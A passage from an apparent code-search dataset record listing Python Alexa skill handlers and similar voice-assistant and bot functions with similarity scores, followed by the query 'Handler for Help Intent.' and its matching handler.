ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def launch_request_handler(handler_input):\n return launch_request(handler_input)", "def launch_request_handler(handler_input):\n speech_text = \"Hello! Are you looking to connect and play with others?\"\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Hello! Are you looking to connect and play with others?\", speech_text)).set_should_end_session(False)\n return handler_input.response_builder.response", "def lambda_handler(event, context):\n logger.info(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"Check that this is being called by our skill\"\"\"\n logger.info(\"Calling app: \"+str(event['session']['application']['applicationId']))\n if (event['session']['application']['applicationId'] !=\n \"amzn1.ask.skill.\"+skill_id):\n logger.error(\"Invalid application ID\")\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started(event, {'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event, event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event, event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event, event['request'], event['session'])\n\n # Otherwise deal with it gracefully\n logger.info(\"Unexpected request type:\")\n logger.info(json.dumps(event))\n return build_response({}, build_speechlet_response(\"Leeds Bins\", \"Welcome to Leeds Bins. Now you can find out which waste bins to take out when. Try asking: what's my next collection.\", None, False))", "def on_intent(request, session):\n\n intent_name = request['intent']['name']\n \n # process the intents\n if intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n \n elif intent_name == \"AMAZON.StopIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response()\n \n elif intent_name == \"AMAZON.FallbackIntent\":\n return get_fallback_response()\n \n elif intent_name == \"recognizeDates\":\n slots = request['intent']['slots']\n date_start_slot = slots.get('dateStart',{'value':'NA'}).get('value','NA')\n date_end_slot = slots.get('dateEnd',{'value':'NA'}).get('value','NA')\n\n return get_intent_response(date_start_slot,date_end_slot)\n \n elif intent_name == \"PollHprofs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n elif intent_name == \"SpinVMs\":\n slots = request['intent'].get('slots','')\n print(slots)\n speechOutput = \"Under development\"\n return response(speech_response(speechOutput, True))\n\n else:\n print(\"For invalid Intents reply with help\")\n return get_help_response()", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"<YOUR INTENT NAME HERE>\":\n # Update the wordsmith_data variable with your data. Use key, value\n # pairs where the key is the column name in Wordsmith and the value is\n # the value contained in that column\n wordsmith_data = { 'column1': 'value1', 'column2': 'value2' }\n narrative = wordsmith.generate(WORDSMITH_API_KEY, WORDSMITH_PROJECT_SLUG, WORDSMITH_TEMPLATE_SLUG, wordsmith_data)\n if 'errors' not in narrative:\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generated Response', narrative['data']['content'],\n '<REPROMPT TEXT HERE>', True))\n else:\n if not isinstance(narrative['errors'], list) :\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(narrative['errors']['detail']),\n '<REPROMPT TEXT HERE>', True))\n else:\n details = ', '.join([e['details'] for e in narrative['errors']])\n return build_response(session.get('attributes', {}), build_speechlet_response('Wordsmith Generation Error', 'Wordsmith reported the following error: {}'.format(details),\n '<REPROMPT TEXT HERE>', True))\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_start(self, ctx):\n pass", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n #if (event['session']['application']['applicationId'] != \"<APPLICATION_ID>\"):\n # raise ValueError(\"Invalid Application ID\")\n\n\n if event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"NextLaunchIntent\":\n return perform_next_launch_intent(intent, session)\n elif intent_name == \"MissionDetailIntent\":\n return get_color_from_session(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n print(\"---INTENT: \" + intent_name)\n\n # Dispatch to your skill's intent handlers\n try:\n if intent_name == \"GetSynonymIntent\":\n return get_synonym(intent, session)\n elif intent_name == \"GetRandomSynonymIntent\":\n return get_random_synonym(intent, session)\n elif intent_name == \"GetAllSynonymsIntent\":\n return get_all_synonyms(intent, session)\n elif intent_name == \"GetAntonymIntent\":\n return get_antonym(intent, session)\n elif intent_name == \"GetRandomAntonymIntent\":\n return get_random_antonym(intent, session)\n elif intent_name == \"GetAllAntonymsIntent\":\n return get_all_antonyms(intent, session)\n elif intent_name == \"GetPOSIntent\":\n return get_pos(intent, session)\n elif intent_name == \"GetRhymeIntent\":\n return get_rhyme(intent, session)\n elif intent_name == \"GetRandomRhymeIntent\":\n return get_random_rhyme(intent, session)\n elif intent_name == \"GetDefinitionIntent\":\n return get_definition(intent, session)\n elif intent_name == \"GetRandomDefinitionIntent\":\n return get_random_definition(intent, session)\n elif intent_name == \"GetAllDefinitionsIntent\":\n return get_all_definitions(intent, session)\n elif intent_name == \"GetSyllablesIntent\":\n return get_syllables(intent, session)\n elif intent_name == \"GetFrequencyIntent\":\n return get_frequency(intent, session)\n elif intent_name == \"GetPronunciationIntent\":\n return get_pronunciation(intent, session)\n elif intent_name == \"GetAllCommandsIntent\":\n return get_all_commands()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that command. I can find definitions, synonyms, antonyms, and more if you say something like 'a synonym for happy'.\", None, True)\n return build_response({}, response)\n\n except:\n response = build_speechlet_response(\"Error\", \"Sorry, I don't know that word!\", None, True)\n return build_response({}, response)", "def launch_intent():\n welcome_message = \"On which cloud would you like to launch Galaxy?\"\n return question(welcome_message).reprompt(help_text)", "def lambda_handler(event, context):\n\n \"\"\"\n This statement prevents someone else from configuring a skill that sends \n requests to this function.\n \"\"\"\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def __init__(self):\n super(LaunchRequest, self).__init__()", "def handle(self, handler_input):\n speech = \"I'm a sample Alexa Skill. Let me give you a random Chuck Norris Fact. \"\n speech += getChuckFact()\n speech += \". Do you want more awesome Chuck facts?\"\n \n \"\"\"\n Take note of the set_should_end_session. If set to 'True', the alexa\n skill will gracefully end execution.AbstractExceptionHandler\n \n The set_card method specifies what kind of cards do you want to use when\n interacting with the user via display. A 'SimpleCard' display's text.\n \n For more info about cards, see:\n https://developer.amazon.com/docs/custom-skills/include-a-card-in-your-skills-response.html\n \"\"\"\n handler_input.response_builder.speak(speech).set_card(\n SimpleCard(speech)).set_should_end_session(False)\n return handler_input.response_builder.response", "def lambda_handler(event, context):\n print(\"Incoming request...\")\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n if (event['session']['application']['applicationId'] !=\n \"amzn1.ask.skill.2994421a-75ef-4502-9d4a-bf83f20a7ade\"):\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent_name = \"\"\n if 'intent' in intent_request:\n intent = intent_request['intent']\n if 'name' in intent:\n intent_name = intent['name']\n\n # Dispatch to your skill's intent handlers\n if not intent_name:\n return get_help_response()\n elif intent_name == \"Hello\":\n return say_hello()\n elif intent_name == \"Brandon\":\n return say_brandon()\n elif intent_name == \"Warning\":\n return say_warning()\n elif intent_name == \"Dance\":\n return say_dance_lights()\n elif intent_name == \"Spot\":\n return say_spot_light()\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n return say_hello()\n return get_help_response()", "def _starting_up():\n global ws, skill_reload_thread, event_scheduler\n\n ws.on('intent_failure', FallbackSkill.make_intent_failure_handler(ws))\n\n # Create skill_manager listener and invoke the first time\n ws.on('skill_manager', skills_manager)\n ws.on('mycroft.internet.connected', install_default_skills)\n ws.emit(Message('skill_manager', {}))\n\n # Create the Intent manager, which converts utterances to intents\n # This is the heart of the voice invoked skill system\n\n PadatiousService(ws)\n IntentService(ws)\n event_scheduler = EventScheduler(ws)\n # Create a thread that monitors the loaded skills, looking for updates\n skill_reload_thread = WatchSkills()\n skill_reload_thread.daemon = True\n skill_reload_thread.start()\n\n # Wait until skills have been loaded once before starting to check\n # network connection\n skill_reload_thread.wait_loaded_priority()\n check_connection()", "def on_intent(intent_request, session):\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"GetLottozahlen\":\n return get_Lottozahlen(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(event):\n\n intent = event[\"request\"][\"intent\"][\"name\"]\n\n if intent in (\"AMAZON.CancelIntent\", \"AMAZON.StopIntent\", \"AMAZON.NoIntent\"):\n return handle_session_end_request()\n\n if intent == \"AMAZON.YesIntent\":\n if \"attributes\" in event[\"session\"] and \"previousIntent\" in \\\n event[\"session\"][\"attributes\"]:\n\n if event[\"session\"][\"attributes\"][\"previousIntent\"] == \"AMAZON.HelpIntent\":\n return main_handler(event)\n\n speech_output = event[\"session\"][\"attributes\"][\"nextStations\"]\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n speech_output = \"Sorry, something went wrong.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)\n\n if intent == \"isBikesAvailable\":\n return main_handler(event)\n\n if intent == \"AMAZON.HelpIntent\":\n return handle_help_intent()\n\n speech_output = \"Sorry, I don\\'t know that.\"\n resp = build_speechlet_response(CARD_TITLE, speech_output, True)\n return build_response(resp)", "def on_intent(request, session):\n\n intent = request['intent']\n\n print(\"on_intent:\", intent)\n\n if intent[\"name\"] == \"AntwortIntent\":\n return handle_answer_request(intent, session)\n elif intent[\"name\"] == \"DontKnowIntent\":\n return handle_answer_request(intent, session)\n elif intent['name'] == \"AMAZON.RepeatIntent\":\n return handle_repeat_request(intent, session)\n elif intent['name'] == \"AMAZON.StopIntent\" or intent['name'] == \"AMAZON.CancelIntent\":\n return handle_finish_session_request(intent, session)\n elif intent['name'] == \"AMAZON.HelpIntent\":\n return get_help(intent, session)\n elif intent['name'] == \"StartQuizIntent\" or intent['name'] == \"AMAZON.StartoverIntent\":\n if session[\"new\"] == False:\n return get_welcome_message(restart=True)\n #if no intent is identified:\n return get_help(intent, session)", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n elif intent_name == \"Ja_Bitte\":\n return Ja_Bitte_session(intent, session)\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"WhensNextTrainIntent\":\n return get_next_train(intent, session)\n elif intent_name == \"SetFavoriteStationIntent\":\n return set_favorite_station(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response(session)\n elif intent_name == \"AMAZON.StopIntent\" or intent_name == \"AMAZON.CancelIntent\":\n return get_stop_response(session)\n else:\n raise ValueError(\"Invalid intent\")", "def launch_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n attr = handler_input.attributes_manager.persistent_attributes\n speech_text = ''\n\n if not attr:\n # create a new one\n attr['character'] = Character().to_dict()\n handler_input.attributes_manager.persistent_attributes = attr\n\n speech_text += (\n \"Welcome to Daily Dungeon. \"\n \"Seems you don't have a character here, so I just created one for you. \")\n\n card_text='Character created successfully.'\n\n else:\n # load the char and claim trophy\n\n attr = handler_input.attributes_manager.persistent_attributes\n cur_char = Character(attr['character'])\n passing_time, loot_exp = cur_char.claim_loot()\n speech_text = 'Welcome to Daily Dungeon. '\n day = passing_time // (24 * 3600)\n hour = (passing_time % (24 * 3600)) // 3600\n minute = (passing_time % 3600) // 60\n if day > 1:\n speech_time = '{} days and {} hours'.format(day, hour)\n elif day == 1:\n speech_time = 'one day and {} hours'.format(hour)\n elif hour > 1:\n speech_time = '{} hours and {} minutes'.format(hour, minute)\n elif hour == 1:\n speech_time = 'one hour and {} minutes'.format(minute)\n else:\n speech_time = '{} minutes'.format(minute)\n\n speech_text += 'It\\'s been ' + speech_time + ' since your last login. '\n\n card_text = 'Offline time: ' + str(datetime.timedelta(seconds=passing_time)) + '\\nExp obtained:{} \\n'.format(loot_exp)\n\n if cur_char.messages:\n speech_text += 'You have unread messages. '\n card_text += 'You have unread messages. \\n'\n\n attr['character'] = cur_char.to_dict()\n\n if 'in_maze' in attr and (attr['in_maze'] == 'IN' or attr['in_maze'] == 'WAIT'):\n speech_text += 'You didnt finish your maze. Say resume the maze to go back to where you were. '\n card_text += 'You did not finish your maze. '\n attr['in_maze'] = 'WAIT'\n\n card = ui.SimpleCard(\n title='Welcome to Daily Dungeon',\n content=card_text\n )\n\n handler_input.attributes_manager.save_persistent_attributes()\n\n handler_input.response_builder.speak(\n speech_text).ask('what would you like to do').set_card(card)\n\n return handler_input.response_builder.response", "def on_intent(event, intent_request, session):\n\n logger.info(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent == \"NextBins\":\n return get_next_collection(event, session)\n\n return get_generic_welcome_message()", "def on_intent(intent_request, session):\r\n\r\n print(\"on_intent requestId=\" + intent_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n\r\n intent = intent_request['intent']\r\n intent_name = intent_request['intent']['name']\r\n\r\n # Dispatch to your skill's intent handlers\r\n if intent_name == \"MakeCoffee\":\r\n return make_coffee(intent, session)\r\n elif intent_name == \"TurnCoffeeMachine\":\r\n return turn_coffee_machine(intent, session)\r\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\r\n return turn_off_coffee_machine()\r\n else:\r\n return invalid_intent()\r\n #raise ValueError(\"Invalid intent\")\r", "async def skill(self, ctx, *, skill: str):\n\n try:\n skill = self.get_entry('Skill', skill.lower())\n except RuntimeError as e:\n return await ctx.send(e)\n\n name = skill['Name']\n\n embed = discord.Embed(title=name)\n embed.set_thumbnail(url='attachment://skill.png')\n embed.add_field(name='Learned', value=skill['Class/Rank'], inline=False)\n embed.add_field(name='Effect', value=skill['Effect'])\n\n await ctx.send(file=discord.File(f'xenox/skills/{name}.png', 'skill.png'), embed=embed)", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n league = brasileirao.get()\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'], league)\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def _skills_manager_dispatch():\n global ws\n ws.emit(Message(\"skill_manager\", {}))", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"HelloWorldIntent\":\n return handle_session_end_request()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AddToCart\":\n return quary(intent, session)\n else:\n print(\"invalid intent\")\n raise ValueError(\"Invalid intent\")", "def launch(self, launch):\n\n self._launch = launch", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n else:\n print (\"********************** Unknown Request\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"RandNumIntent\":\n return generate_random_num(intent, session)\n elif intent_name == \"RangeRandNumIntent\":\n return generate_random_num(intent, session)\n elif intent_name == \"DiceIntent\":\n return generate_random_num(intent, session, num1=1, num2=6)\n elif intent_name == \"HundredDiceIntent\":\n return generate_random_num(intent, session, num1=1, num2=100)\n elif intent_name == \"RouletteIntent\":\n return generate_random_num(intent, session, num1=1, num2=10)\n elif intent_name == \"SelectIntent\":\n return generate_random_num(intent, session, num1=1)\n elif intent_name == \"RepeatIntent\":\n if 'attributes' not in session:\n return handle_error_status()\n else:\n attributes = session.get('attributes')\n return generate_random_num(intent, session, **attributes)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_launch():\n return get_welcome_message()", "def lambda_handler(event, context):\n print('HANDLING EVENT')\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n\n # try to get a valid token for this user, from the cache,\n # if not in the cache, the create a new (this will send\n # the user to a web page where they can authorize this app)\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n\n if (event['session']['application']['applicationId'] not in alexa_trusted_appids):\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n token_info = sp_oauth.get_cached_token()\n if not token_info:\n print('''\n Invalid or no token\n ''')\n raise spotipy.SpotifyException(401, -1, 'Invalid or no token')\n\n token = token_info['access_token']\n sp = spotipy.Spotify(auth=token)\n sp.trace = False\n results = sp.start_playback(device_id=SPOTIPY_DEVICE_ID,\n context_uri=SPOTIPY_CONTEXT_URI)\n print(results)\n # print(\"[<<DEVELOPER>>] launch request:\")\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(event)\n\n #### trigger IFTTT mood lighting\n r = http.request('GET', IFTTT_URI)\n print(\"IFTTT request status: \" + str(r.status))\n\n return handle_session_end_request()\n # silently error\n\n # if event['request']['type'] == \"LaunchRequest\":\n # return on_launch(event['request'], event['session'])\n # elif event['request']['type'] == \"IntentRequest\":\n # return on_intent(event['request'], event['session'])\n # elif event['request']['type'] == \"SessionEndedRequest\":\n # return on_session_ended(event['request'], event['session'])", "def lambda_handler(event, context):\r\n if 'session' in event:\r\n print(\"event.session.application.applicationId=\" +\r\n event['session']['application']['applicationId'])\r\n\r\n \"\"\"\r\n Uncomment this if statement and populate with your skill's application ID to\r\n prevent someone else from configuring a skill that sends requests to this\r\n function.\r\n \"\"\"\r\n if ('session' in event and (event['session']['application']['applicationId'] !=\r\n \"amzn1.ask.skill.57119d91-fb3c-487f-be53-4e7fac12fb83\")):\r\n raise ValueError(\"Invalid Application ID\")\r\n\r\n \"\"\"if event['session']['new']:\r\n on_session_started({'requestId': event['request']['requestId']},\r\n event['session'])\"\"\"\r\n\r\n if event['request']['type'] == \"LaunchRequest\":\r\n return on_launch(event['request'], event['session'])\r\n elif event['request']['type'] == \"IntentRequest\":\r\n return on_intent(event['request'], event['session'])\r\n elif event['request']['type'] == \"SessionEndedRequest\":\r\n return on_session_ended(event['request'], event['session'])\r\n elif event['request']['type'] == 'UPDATE':\r\n return saveCoffeeMachineStatus(event['request'])\r\n elif event['request']['type'] == \"GLASS\":\r\n return glassStatus(event['request'])\r\n elif event['request']['type'] == \"WATER\":\r\n return waterStatus(event['request'])\r\n elif event['request']['type'] == \"COFFEE\":\r\n return coffeeStatus(event['request'])\r\n elif event['request']['type'] == \"ON_OFF\":\r\n return on_off_status(event['request'])\r\n elif event['request']['type'] == \"ONLINE\":\r\n return online_status_f(event['request'])\r\n elif event['request']['type'] == 'BUSY':\r\n return busyStatus(event['request'])", "def lambda_handler(event, context):\r\n print(\"Incoming request...\")\r\n\r\n \"\"\"\r\n Uncomment this if statement and populate with your skill's application ID to\r\n prevent someone else from configuring a skill that sends requests to this\r\n function.\r\n \"\"\"\r\n # if (event['session']['application']['applicationId'] !=\r\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\r\n # raise ValueError(\"Invalid Application ID\")\r\n\r\n if event['session']['new']:\r\n on_session_started({'requestId': event['request']['requestId']},\r\n event['session'])\r\n\r\n if event['request']['type'] == \"LaunchRequest\":\r\n return on_launch(event['request'], event['session'])\r\n elif event['request']['type'] == \"IntentRequest\":\r\n return on_intent(event['request'], event['session'])\r\n elif event['request']['type'] == \"SessionEndedRequest\":\r\n return on_session_ended(event['request'], event['session'])", "def on_start(self):", "def on_start(self):", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] + \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"StartIntent\": \n '''if \"attributes\" in session.keys():\n return answer_question(intent,session)\n '''\n return start_feedback(intent, session)\n \n elif intent_name == \"AnswerIntent\":\n return answer_question(intent, session)\n \n elif intent_name == \"AMAZON.ResumeIntent\":\n return resume_feedback(intent, session)\n \n elif intent_name == \"AMAZON.PauseIntent\":\n return pause_feedback(intent, session)\n \n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n \n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request(session)\n \n else:\n raise ValueError(\"Invalid intent\")", "async def handle(self):\n local_controller = self.controller\n local_controller.add_action(local_controller.larvae.random.train(HYDRALISK))\n return True", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "async def post_launch(self, **kwargs: Any) -> None:\n pass" ]
[ "0.7680054", "0.7644753", "0.7633401", "0.7608987", "0.7601289", "0.7596736", "0.75540215", "0.75540215", "0.755073", "0.7501771", "0.7501771", "0.7501771", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7473019", "0.74665284", "0.74624527", "0.73820716", "0.73386073", "0.66323274", "0.6275754", "0.6216917", "0.61969507", "0.6178782", "0.6092518", "0.6045752", "0.59480846", "0.5928729", "0.5883608", "0.5847982", "0.5824695", "0.5823489", "0.57614344", "0.57345694", "0.5710309", "0.56852835", "0.5676373", "0.5657934", "0.56518", "0.5649453", "0.56488425", "0.5646135", "0.56013805", "0.5594919", "0.5579775", "0.5576167", "0.5566848", "0.55565923", "0.5550249", "0.5541274", "0.5519869", "0.5493353", "0.5479133", "0.54765475", "0.54710454", "0.54484665", "0.54479194", "0.5443183", "0.5441047", "0.5440796", "0.5431785", "0.54222107", "0.54126936", "0.541093", "0.53915817", "0.5391561", "0.53881615", "0.5387033", "0.5385074", "0.53787297", "0.5375658", "0.5368319", "0.53682035", "0.5366981", "0.53619915", "0.53619915", "0.5357362", "0.5343537", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.53398794" ]
0.56940675
48
Handler for Help Intent.
def help_intent_handler(handler_input): # type: (HandlerInput) -> Response handler_input.response_builder.speak(help_text).ask(help_text) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Help(self, event):\n Help(self)", "def on_bot_help(update, _context):\n update.message.reply_text(c.MSG_HELP)", "def help_handler(bot, update):\n logger.info(f\"Help command received. Chat ID: {update.message.chat_id}\")\n update.message.reply_text(config.HELP_MESSAGE)", "def onHelp(self, event):\n if self.helpwindow is None:\n self.helpwindow = sc.getHelpWindow()\n self.helpwindow.DisplayContents()", "def cb_help( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n #help_file = self.parameters.help_file\r\n AppGlobal.os_open_help_file( self.parameters.help_file )", "def _help(self):\n self.onecmd('help')", "def help_command(update, context):\n update.message.reply_text('Help!')", "def help_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n # TODO: set a speech here\n speech_text = (\n \"Here should be a help speech.\")\n reprompt = \"Here should be a help reprompt.\"\n\n handler_input.response_builder.speak(speech_text).ask(reprompt)\n return handler_input.response_builder.response", "async def do_help():\n\n if len(message.content.split()) > 1:\n for i in cmd_dict:\n if message.content.split()[1] == i:\n await bot.send_message(c, f'Help for {i}: {cmd_dict[i].__doc__}')\n return\n\n cmdstr = 'Commands: '\n for i in cmd_dict:\n cmdstr += '{}, '.format(i)\n await bot.send_message(c, cmdstr)", "def help_command(update: Update, _: CallbackContext) -> None:\n 